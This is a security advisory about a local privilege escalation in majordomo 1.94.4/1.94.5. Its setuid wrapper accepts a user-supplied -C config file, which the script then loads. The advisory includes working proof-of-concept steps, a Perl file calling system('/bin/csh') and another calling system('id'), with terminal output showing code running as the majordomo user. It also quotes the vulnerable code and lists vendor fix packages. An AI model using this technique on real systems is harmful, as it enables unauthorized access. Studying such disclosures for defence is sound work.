COMMAND

    majordomo

SYSTEMS AFFECTED

    majordomo 1.94.4 (others?)

PROBLEM

    Shevek found following.  It's  a way to get majordomo  privelidges
    as a user:

        shevek@tirin ~$ cat foo.pl
        system("/bin/csh");
        shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
        %
        %whoami
        majordom

        root@tirin /usr/local/majordomo# ls -ld .
        drwxr-x--x   6 majordom daemon       1024 Dec  2 21:49 ./
        root@tirin /usr/local/majordomo# ls -l wrapper
        -rwsr-xr-x   1 root     daemon       6630 Jul 12 11:21 wrapper*

    The lines in Majordomo (found  the bug by simple inspection,  it's
    also in resend):

    $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

    while ($ARGV[0]) {      # parse for config file or default list
        if ($ARGV[0] =~ /^-C$/i) {  # sendmail v8 clobbers case
            $cf = $ARGV[1];
            shift(@ARGV);
            shift(@ARGV);
        } elsif ($ARGV[0] eq "-l") {
            $deflist = $ARGV[1];
            shift(@ARGV);
            shift(@ARGV);
        } else {
            die "Unknown argument $ARGV[0]\n";
        }
    }
    if (! -r $cf) {
        die("$cf not readable; stopped");
    }

    require "$cf";

    This was tested with  majordomo version 1.94.4 and  Perl 5.005_03.
    Whereas majordomo 1.94.5  does fix the  bug in resend,  discovered
    by  Brock  Tellier,  that  permits  execution of arbitrary code as
    user majordomo, it  apparently does not  fix the other  bug in the
    script  majordomo,  that  permits  execution  of  arbitrary config
    files as user majordomo.   On a fresh install of  majordomo 1.94.5
    in /tmp:

        [brock@o2 /tmp]$ id
        uid=1116(brock) gid=1116(brock)
        [brock@o2 /tmp]$ ls -l ./id.pl
        -rwxr-xr-x    1 brock    brock         31 Jan 24 14:17 ./id.pl
        [brock@o2 /tmp]$ cat id.pl
        #!/usr/bin/perl

        system("id");
        [brock@o2 /tmp]$ ./majordomo-1.94.5/wrapper majordomo -C ./id.pl
        uid=1126(majordomo) gid=1(daemon)
        ./id.pl did not return a true value at /tmp/majordomo-1.94.5/majordomo
        line 47.
        [brock@o2 /tmp]$

SOLUTION

    For Red Hat Powertools 6.1:

        intel: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/i386/majordomo-1.94.5-2.i386.rpm
        alpha: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/alpha/majordomo-1.94.5-2.alpha.rpm
        sparc: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/sparc/majordomo-1.94.5-2.sparc.rpm
        sources: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/SRPMS/majordomo-1.94.5-2.src.rpm